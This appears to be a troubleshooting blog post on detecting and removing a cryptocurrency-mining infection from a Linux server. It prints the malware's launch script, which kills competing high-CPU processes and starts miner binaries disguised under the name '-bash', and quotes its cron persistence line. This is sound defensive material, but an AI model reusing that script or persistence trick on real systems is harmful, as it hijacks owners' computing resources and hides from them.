How to Detect and Remove a Hidden CPU‑Mining Virus on Your Linux Server

Background

While working on a project the server became unusually sluggish, and the CPU was constantly at 100% despite no heavy workloads. Investigation revealed the server was infected by a cryptocurrency mining virus.

Problem Investigation

Run top to find processes with high CPU usage and note their pid.

Determine which file started the process with ls -l /proc/<pid>/exe.

Navigate to the directory shown (e.g., /var/tmp/.cache) and list its contents.

Inspect the run script in that directory. The script kills processes using more than 40% CPU (excluding certain binaries) and then launches hidden mining binaries ( h32 or h64) based on the system architecture.

# Example of the malicious script
ps aux | grep -vw 'xmr-stak\|ld-linux.so.2' | (test -e bash.pid && grep -vwf bash.pid) \
    | awk '{if($3>40.0) print $2}' | while read procid; do kill -9 $procid; done 2>/dev/null
proc=$(nproc)
ARCH=$(uname -m)
HIDE="-bash"
if [ "$ARCH" == "i686" ]; then
    ./h32 -s $HIDE ./java >>/dev/null &
elif [ "$ARCH" == "x86_64" ]; then
    ./h64 -s $HIDE ./java >>/dev/null &
fi
pid=$!
new_pid=$((pid + 1))
echo $new_pid > bash.pid

The attacker first kills high‑CPU processes to make room for his mining program, not to help the system.

Problem Handling

After identifying the malicious process (e.g., PID 1234), kill it with: kill -9 1234 If the CPU spikes again, a scheduled cron job is likely restarting the miner. Edit the crontab with crontab -e and remove the line: * * * * * /var/tmp/.cache/upd >/dev/null 2>&1 Finally, delete the infected directory:

rm -rf /var/tmp/.cache

Summary

To remediate a CPU‑mining virus on a Linux server: use top to locate the offending process, trace its executable, examine and stop the malicious script, remove any cron jobs that relaunch it, and delete the hidden cache directory.